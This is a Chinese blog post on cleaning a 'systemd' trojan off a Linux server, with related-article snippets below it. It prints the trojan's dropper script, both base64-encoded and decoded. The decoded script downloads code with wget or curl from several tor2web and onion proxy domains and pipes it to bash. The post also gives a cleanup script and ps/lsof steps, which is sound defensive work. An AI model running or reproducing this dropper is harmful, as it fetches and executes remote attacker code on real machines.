systemd木马问题解决

最新推荐文章于 2023-06-05 09:09:00 发布
最新推荐文章于 2023-06-05 09:09:00 发布
阅读量1.3k 收藏 1
点赞数
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dubaiToT/article/details/102716845
版权

文章目录

木马解决

木马文件

#!/bin/bash
exec &>/dev/null
sleep 167
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD00Y2M0Zng3N2I3dmh4djVhCnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtVDE4MCAtcVUtIC1PL
SAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJHggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSR4Cn0KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgooCnUgJHQudG9yMndlYi5pbyB8fAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQub25
pb24ubW4gfHwKdSAkdC50b3Iyd2ViLnRvIHx8CnUgJHQub25pb24ud3MgfHwKdSAkdC5vbmlvbi5pbi5uZXQgfHwKdSAkdC5vbmlvbi50bwopfGJhc2gKZmkK|base64 -d|bash
  • 解密
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=4cc4fx77b7vhxv5a
u() {
x=/crn
wget -t1 -T180 -qU- -O- --no-check-certificate $1$x || curl -m180 -fsSLkA- $1$x
}
if ! ls /proc/$(cat /tmp/.X11-unix/0)/io; then
(
u $t.tor2web.io ||
u $t.onion.glass ||
u $t.onion.mn ||
u $t.tor2web.to ||
u $t.onion.ws ||
u $t.onion.in.net ||
u $t.onion.to
)|bash
fi

清除木马的命令

[root@ci ~]# cat qingchu.sh 
#!/bin/bash
kill -9 $(cat /tmp/.X11-unix/*)
rm -rf /tmp/.X11-unix/*
sed -i '/systemd-init/d' /var/spool/cron/root
rm -rf /etc/cron.d/0systemd
rm -rf /usr/lib/systemd/systemd-init
rm -rf /lib/systemd/systemd-init
rm -rf /root/.systemd-init



杀掉木马进程
使用
ps -lef   
找出可疑的进程
例如
1 S root       964     1  0  80   0 -   557 hrtime Oct03 ?        00:00:04 wdQbhA


1 S root      67000      1  0  80   0 -   557 hrtime Oct03 ?        00:00:03 0fvpPD


1 S root       1963      1  0  80   0 -   557 hrtime Aug28 ?        00:00:05 fvInxF 


1 S root     127292      1 99  80   0 - 20051 futex_ 18:16 ?        2-15:45:17 1GUo01


查看这些进程是怎样启动的,通过什么启动的
[root@ci ~]# lsof -p 1963
COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF      NODE NAME
fvInxF  1963 root  cwd    DIR    8,2     4096  67108929 /root
fvInxF  1963 root  rtd    DIR    8,2     4096        64 /
fvInxF  1963 root  txt    REG    8,2    20972  68875717 /root/597ea2f6238a0d2d5f451b89eaf270e3 (deleted)
fvInxF  1963 root    0w   REG    8,2        5 202855197 /tmp/.X11-unix/0 (deleted)
[root@ci ~]# bash -x qingchu.sh 

杀掉这些进程
dubaiToT
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Linux系统常见的病毒介绍(附解决方案)
makaisghr的专栏
06-16 8087
Linux系统常见的病毒介绍Linux系统常见的病毒介绍BillGatesDDGSystemdMinerStartMinerWatchdogsMinerXorDDosRainbowMiner Linux系统常见的病毒介绍 BillGates BillGates在2014年被首次发现,由于其样本中多变量及函数包含字符串”gates”而得名,该病毒主要被黑客用于DDos,其特点是会替换系统正常程序(ss、netstat、ps、lsof)进行伪装 主机中毒现象: [1] 在/tmp/目录下存在gates.lod、
一次Linux服务器被入侵和删除木马程序的经历
qq_30665009的博客
05-19 2566
一、背景 上午看到有台服务器流量跑的很高,明显和平常不一样,流量达到了500Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包。 我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面有物理防火墙,而且机器都是做的端口映射,也不是常见的端口,按理来说应该是满安全的,可能最近和***有缘吧,老是让我遇到,也趁这次机会把发现过程记录一下。二、发现...
linux漏洞 远程,Linux Systemd被爆远程漏洞 CVE-2017
weixin_39739846的博客
05-06 221
Systemd (linux 操作系统流行的 init 系统和服务管理器) 中发现了一个关键漏洞, 这使得远程攻击者有可能触发缓冲区溢出, 从而通过 dns 响应在目标计算机上执行恶意代码。Systemd是什么systemd 是一种系统初始化程序。和 sysVinit 以及 upstart 一样,systemd 会成为系统开机时启动的第一个进程(至少 PID 是 1),由它掌管计算机接下来要做...
Systemd Unit文件中PrivateTmp字段详解-Jason.Zhi
weixin_30391339的博客
06-28 558
如下图,在开发调试的时候会遇到这么一个问题。 file_put_contents时,$tmp_file显示的目标文件是/tmp/xxx.而这个文件实际放在linux的目录却是/tmp/systemd-private-xxxxx-php-fpm.service/xxx(见图二) 为什么会出现这种情况? 只要使用Systemd这个进程作为启动进程的linux系统,其子进程都会有...
systemd 管理工具详解
larance的挨踢生活
08-03 1418
比如systemctl、hostnamectl、timedatectl、localctl等命令,这些命令虽然改写了init时代用户的命令使用习惯(不再使用chkconfig、service等命令),但确实也提供了很大的便捷性。systemd是目前Linux系统上主要的系统守护进程管理工具,由于init一方面对于进程的管理是串行化的,容易出现阻塞情况,另一方面init也仅仅是执行启动脚本,并不能对服务本身进行更多的管理。服务的主体定义,主要定义服务的一些运行参数,及操作动作。:记录unit文件的通用信息。..
systemd service中文手册
03-02
systemd 是 Linux 系统中的一种初始化系统,用于管理系统启动后的各种服务和守护进程。`systemd.service` 文件是 systemd 管理服务的核心配置文件,它定义了一个被 systemd 监控和控制的进程。本手册是 `systemd....
systemd进程管理
12-25
3. systemd 解决了原有模式的缺陷,如原有 service 不会关闭程序产生的子进程。 systemd 的主要组件包括: 1. unit:unit 是 systemd 中的基本组件,每个 unit 都是一种抽象的配置单元,可以认为是一个服务、挂载...
systemd启动脚本.pdf
12-27
systemd 启动脚本详解 Systemd 启动脚本是 Linux 系统中的一种服务管理机制,它用于管理和控制系统服务的启动、停止和重启。Systemd 启动脚本是 systemd 服务管理器的一部分,它使用配置文件来定义服务的启动顺序、...
systemd-devel
最新发布
07-18
systemd-devel
systemd
03-11
请参阅我们的,以获取有关提交GitHub问题和发布GitHub Pull Requests的更多信息。 在为systemd准备补丁时,请遵循我们的。 如果您需要支持,请联系我们的或加入我们的IRC频道。 与回迁的补丁稳定分支是可用的。
C:\Windows\System32 中 cmd丢失,cmd.exe 下载
10-22
C:\Windows\System32中cmd文件丢失,如果打开cmd,显示不存在,那么你的电脑里面的cmd.exe可执行文件丢失了,需要重新添加,打开我的电脑,搜索如下路径:C:\Windows\System32 ,将下载下来的cmd.exe文件添加到这个路径下的文件夹中即可。(免费下载)
小白被挖矿木马整emo的一天
A_991128a的博客
02-20 641
今天在打开服务器准备进入docker中的mysql测试sqlmode时,突然发现进不去mysql,然后我一看,mysql挂了,不止mysql,其他应用也全挂了。kswapd0占用过高是因为 物理内存不足,使用swap分区与内存换页操作交换数据,导致CPU占用过高。(后来我才领悟,原来这根本不是kswapd0,而是木马程序伪装的[kswapd0],专门骗我这种小白)可以看到2394这个进程占用cpu最多,于是我看了很久没查出什么问题,于是直接kill 2349cpu降下来了。。。
linux挖矿木马systemdMiner分析 bash下载执行模块
whatday的专栏
01-24 3139
近日,深信服安全团队捕获到一款新型的Linux挖矿木马,该木马通过bash命令下载执行多个功能模块,通过SSH暴力破解、SSH免密登录利用、Hadoop Yarn未授权访问漏洞和自动化运维工具内网扩散,且该木马的文件下载均利用暗网代理,感染后会清除主机上的其他挖矿木马,以达到资源独占的目的。 感染现象 被感染的Linux服务器上,可以明显看到一个CPU占用率很高的进程,名字为随机字符: ...
一个名为systemd-init的CPU挖矿病毒及后续
weweeeeeeee的博客
11-11 2519
一个名为systemd-init的CPU挖矿病毒及后续 作者root在安全 今天接到了报警,一台内部的服务器CPU负载嗷嗷的高,感到非常的疑惑,就点进去看看负载情况 CPU爆满 监控诚不欺我,果然是CPU跑爆了,然后看看Command,发现都是M开头的,这肯定就是病毒了,就开始处理 发现运行最长的进程PID是32336,就拿它下刀开始查 发现,毛都查不到,就开始按照...
美国病毒systemd占用100%,root密码登录卡死
qq_28546559的博客
06-05 194
1,top 查看到有僵尸进程一直启动 2,lsof -p 752 查看进程的来源 3,crontab -l 查看定时任务,是否有自动启动
systemd服务详解
wangshui898的专栏
12-24 3780
模块概述 [Unit]部分 主要是对这个服务的说明,内容, 文档介绍以及对一些依赖服务定义 Description:描述信息 After:表明需要依赖的服务,作用决定启动顺序 Before:表明被依赖的服务 Requles:依赖到的其他unit ,强依赖,即依赖的unit启动失败。该unit不启动。 Wants:依赖到的其他unit,弱依赖,即依赖的unit 启动失败。该unit继续启动 Conflicts:定义冲突关系 处理依赖关系 使用systemd时,可通过正确编写单元配置文件来解决其依赖关系。典
最简明的 Systemd 进程管理教程
果子哥丶的博客
11-07 2116
systemd 介绍 systemd是目前Linux系统上主要的系统守护进程管理工具,由于init一方面对于进程的管理是串行化的,容易出现阻塞情况,另一方面init也仅仅是执行启动脚本,并不能对服务本身进行更多的管理。所以从CentOS 7开始也由systemd取代了init作为默认的系统进程管理工具。 systemd所管理的所有系统资源都称作Unit,通过systemd命令集可以方便的对这些Unit进行管理。比如systemctl、hostnamectl、timedatectl、localctl等命令,这
遭遇syst3md挖矿病毒(2)
u013469501的博客
04-14 1041
上一篇说道我清除了syst3md挖矿病毒程序后,原本以为这事就解决了,可事情没这么简单,top命令显示虽然没有高消耗的进程,但US%很持续50%,32核的长期占用16核的100%,见下图 在使用一系列操作系统命令排查后,占用cpu较高的程序或进程始终没有找到。 期间考虑过是不是由于操作系统内核版本命中了有缺陷的内核导致的,但和其他一样操作系统比对来看,那台机器并没有发生这种现象。 最终,将排查方向还是锁定在病毒未清除干净这个方向上。继续参考了多个博客发现一个共同点,那就是top命令中的用户
服务器中病毒解决思路
又逢乱世
12-13 2214
1,查看有没有新增的陌生用户 vim /etc/passwd 发现了一个陌生用户 lsb 现在删除这个用户 userdel -r -f lsb 发现删除不了,查看/etc/passwd文件的权限 发现了这个文件被加了隐藏权限 ----ia-------e-- 就是加了隐藏权限,我们需要去除隐藏权限 查看隐藏权限: lsattr /etc/passwd 删除隐藏权限: chattr -i/etc/passwd chattr -a/etc/passwd ...
openwrt systemd
01-11
OpenWrt默认使用的是init系统,而不是systemd。init是Linux系统中的第一个进程,负责启动其他进程和服务。而systemd是一种新一代的init系统,它提供了更多的功能和特性,例如并行启动服务、自动化进程管理、日志记录...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值